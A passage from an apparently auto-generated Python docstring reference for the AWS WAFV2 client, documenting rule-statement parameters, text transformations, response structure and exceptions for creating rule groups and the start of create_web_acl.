--\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:type VisibilityConfig: dict
:param VisibilityConfig: [REQUIRED]\nDefines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n
:type Tags: list
:param Tags: An array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
Response Structure
(dict) --
Summary (dict) --
High-level information about a RuleGroup , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a RuleGroup , and the ARN, that you provide to the RuleGroupReferenceStatement to use the rule group in a Rule .
Name (string) --
The name of the data type instance. You cannot change the name after you create the instance.
Id (string) --
A unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def create_web_acl(Name=None, Scope=None, DefaultAction=None, Description=None, Rules=None, VisibilityConfig=None, Tags=None):
"""
Creates a WebACL per the specifications provided.
A Web ACL defines a collection of rules to use to inspect and control web requests. Each rule has an action defined (allow, block, or count) for requests that match the statement of the rule. In the Web ACL, you assign a default action to take (allow, block) for any request that does not match any of the rules. The rules in a Web ACL can be a combination of the types Rule , RuleGroup , and managed rule group. You can associate a Web ACL with one or more AWS resources to protect. The resources can be Amazon CloudFront, an Amazon API Gateway API, or an Application Load Balancer.
See also: AWS API Documentation
Exceptions
:example: response = client.create_web_acl(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
DefaultAction={
'Block': {}
,
'Allow': {}
},
Description='string',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
VisibilityConfig={
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type DefaultAction: dict
:param DefaultAction: [REQUIRED]\nThe action to perform if none of the Rules contained in the WebACL match.\n\nBlock (dict) --Specifies that AWS WAF should block requests by default.\n\nAllow (dict) --Specifies that AWS WAF should allow requests by default.\n\n\n
:type Description: string
:param Description: A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
:type Rules: list
:param Rules: The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case 